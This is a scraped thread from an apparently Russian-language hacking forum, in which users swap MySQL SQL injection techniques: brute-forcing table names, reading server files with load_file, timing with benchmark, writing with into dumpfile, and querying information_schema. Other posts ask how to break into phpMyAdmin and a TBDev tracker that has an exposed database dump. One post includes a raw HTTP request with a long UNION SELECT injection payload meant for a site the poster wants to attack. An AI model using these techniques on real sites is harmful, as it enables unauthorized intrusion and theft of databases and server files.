Lidloses_Auge
If I'm not mistaken there is no other way to get some information. You can use lists of table names it'll be like a b-forse)))
look here for table base
http://forum.antichat.ru/nextnewesttothread49622.html

There's no another way to check if a table with current name exists.
For instance u can write a script which will check them one by one from a dictionary as the chance of some tables' with default names existance is rather high.

I'm just searching for more possibilities of using an injection like:

load_file
benchmark
ascii(lowerstring(substring ....
information_schema
into dumpfile

you know more interesting ways?

Подскажите мне пожалуйста вот когда я использую load_file() я могу сделать так - load_file('/index.php')? и если я так сделаю то я увижу исходник страницы?

И как вообще узнать что эта функция работает? только если то что я в ней указал вылезит на экран так?

Yes you can, but you've to look in the Sites Source, for the source you want to display.
E.g.:

load_file('/index.php')
then you've to watch the source and look after the index.php.
In some cases the index.php isn't printed correctly so you've to watch in the source.
You can also hex-encode the load_file and decrypt it later.

увидишь, только если в корне есть файл index.php (он там нафиг не нужен)
В качестве аргумента в эту функцию надо передавать реальный путь, а не относительный (можно конечно и относительный, но толку в этом немного, так как тогда нужно будет указывать путь относительно каталога файлов mysql сервера)

узнать есть ли файловые привилегии у пользователя можно например так:
но это только если есть доступ к mysql.user

если нет то только с помошью анализа результата функции, все неудобство в том, что если файла не существует или есть ограничения на чтение файла (например права доступа) то функция возвращает null а не выплевывает ошибки

__________________
Карфаген должен быть разрушен...

Кароче.Возможно повторп,но прошу не пинать.
Есть 2 вопроса:
1)Как можно ломануть phpmyadmin;
2)Есть трекер.Движко TBDev.Там,на трекере есть папка с файлом дампа Базы Данных.ЕЕ надо удалять после устаовки.Но ее не удалили. помоему там есть права на запись,хотя могу ошбатсо.НУ чем ето может помочь?И вообще кто-нибудь знает как ломать ети двиги?

-----пример-----
http://deniska.ath.cx/ - только помоему рабаотает после 14.00

ikolla$$,
1)http://milw0rm.com/search.php в строке поиске пишешь phpmyadmin. То же самое можно проделать на securitylab.ru, securityfocus.com и т.д.

2)Ну попробуй скачать этот дамп и посмотреть что в нем есть интересного. Хотя, имхо, ничего в нем нет интересного, ибо там скорее всего просто дефолтное строение бд без значений, которые потом уже вбивались.

Народ, а как выполнить запрос, если полей там около тысячи ?)))).В URL ведь количество вводимых символов ограничено, потому запрос через юрл никак((

Пробывал вот POST запрос:

GET /page.html?id=5 HTTP/1.1
Accept: */*
Accept-Language: uk
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SQL_TOOL)
Host: host.ru
Connection: Close
Content-Type: text/html
Content-Length: 2850

%20union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 ,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,6 5,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81, 82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98 ,99,100,101,102,103,104,105,106,107,108,109,110,11 1,112,113,114,115,116,117,118,119,120,121,122,123, 124,125,126,127,128,129,130,131,132,133,134,135,13 6,137,138,139,140,141,142,143,144,145,146,147,148, 149,150,151,152,153,154,155,156,157,158,159,160,16 1,162,163,164,165,166,167,168,169,170,171,172,173, 174,175,176,177,178,179,180,181,182,183,184,185,18 6,187,188,189,190,191,192,193,194,195,196,197,198, 199,200,201,202,203,204,205,206,207,208,209,210,21 1,212,213,214,215,216,217,218,219,220,221,222,223, 224,225,226,227,228,229,230,231,232,233,234,235,23 6,237,238,239,240,241,242,243,244,245,246,247,248, 249,250,251,252,253,254,255,256,257,258,259,260,26 1,262,263,264,265,266,267,268,269,270,271,272,273, 274,275,276,277,278,279,280,281,282,283,284,285,28 6,287,288,289,290,291,292,293,294,295,296,297,298, 299,300,301,302,303,304,305,306,307,308,309,310,31 1,312,313,314,315,316,317,318,319,320,321,322,323, 324,325,326,327,328,329,330,331,332,333,334,335,33 6,337,338,339,340,341,342,343,344,345,346,347,348, 349,350,351,352,353,354,355,356,357,358,359,360,36 1,362,363,364,365,366,367,368,369,370,371,372,373, 374,375,376,377,378,379,380,381,382,383,384,385,38 6,387,388,389,390,391,392,393,394,395,396,397,398, 399,400,401,402,403,404,405,406,407,408,409,410,41 1,412,413,414,415,416,417,418,419,420,421,422,423, 424,425,426,427,428,429,430,431,432,433,434,435,43 6,437,438,439,440,441,442,443,444,445,446,447,448, 449,450,451,452,453,454,55,456,457,458,459,460,461 ,462,463,464,465,466,467,468,469,470,471,472,472,4 74,475,476,477,478,479,480,481,482,483,484,485,486 ,487,488,489,490,491,492,493,494,495,496,497,498,4 99,500,501,502,503,504,505,506,507,508,509,510,511 ,512,513,514,515,516,517,518,519,520,521,522,523,5 24,525,526,527,528,529,530,531,532,533,534,535,536 ,537,538,539,540,541,542,543,544,545,546,547,548,5 49,550,551,552,553,554,555,556,557,558,559,560,561 ,562,563,564,565,566,567,568,569,570,571,572,573,5 74,575,576,577,578,579,580,581,582,583,584,585,586 ,587,588,589,590,591,592,593,594,595,596,597,598,5 99,600,601,602,603,604,605,606,607,608,609,610,611 ,612,613,614,615/*

Что я сделал не так? Объясните пожалуйста)).Сайт сказать не могу, ибо сам хочу попробывать ))